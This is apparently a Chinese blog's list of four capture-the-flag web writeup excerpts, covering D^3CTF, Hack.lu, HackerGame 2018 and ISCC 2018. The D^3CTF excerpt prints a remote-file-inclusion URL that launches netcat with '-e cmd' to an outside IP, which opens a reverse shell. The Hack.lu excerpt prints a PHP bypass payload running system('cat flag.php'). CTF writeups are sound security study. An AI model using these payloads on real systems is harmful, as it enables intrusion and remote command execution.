- 博客(4)
- 收藏
- 关注
RSS订阅
原创 2019 D^3CTF_wp:fakeonlinephp解法(类实网渗透)
D3ctf fake_online_php 题解外网渗透部分smb协议利用导致远程文件包含http://35547429ed.fakeonelinephp.d3ctf.io/?orange=\**********\share\test5&a=…\nc2.exe±e+cmd+39.105.136.196+30023内网渗透部分再写一个马子进入远程桌面...
2019-11-26 09:55:16
3501
原创 Hacklu baby_php wp
Baby_php这题就是各种php黑魔法的集合,先上payload/?msg=php://input&key1=1337&key2=000000000000000000000000000000000001337$&cc[]=&k1=2&bb=system(‘cat flag.php’);//Post数据加上Hello Challenge!介绍几个Ph...
2018-10-26 00:15:07
360
原创 中科大HackerGame2018 web题目 writeup
虽然很坑,但是总体来说这次还是做了很多有意思的web题,这里也只给出web题的答案一:签到题打开发现是要输入key值提交但是输入后发现限制了长度,只允许输入到hackergame201打开burp,截包,改包,发送得到flag二:Word文档打开题目链接发现是下载了一个officeopenXML.docx的文件上网查阅发现这个是早期word推出的一种文件格式,其实可以改成zi...
2018-10-26 00:14:59
2382
原创 iscc_2018 web题解
一切都是套路开头比较客气,试了.bak .swp .svn都没有出来,结果发现是.txt,还是自己想复杂了典型的变量覆盖漏洞,不用想了,直接先将flag的值赋给flag的值赋给flag的值赋给_200变量,然后利用die($_200)将flag打印出来。你能绕过吗id那里是只允许输入int吧我估计。。。什么十六进制或者其他的字母都认不出来,可能我水平不够想不到其他注入了。我...
2018-10-25 23:26:19
2242
空空如也
空空如也
TA创建的收藏夹 TA关注的收藏夹
TA关注的人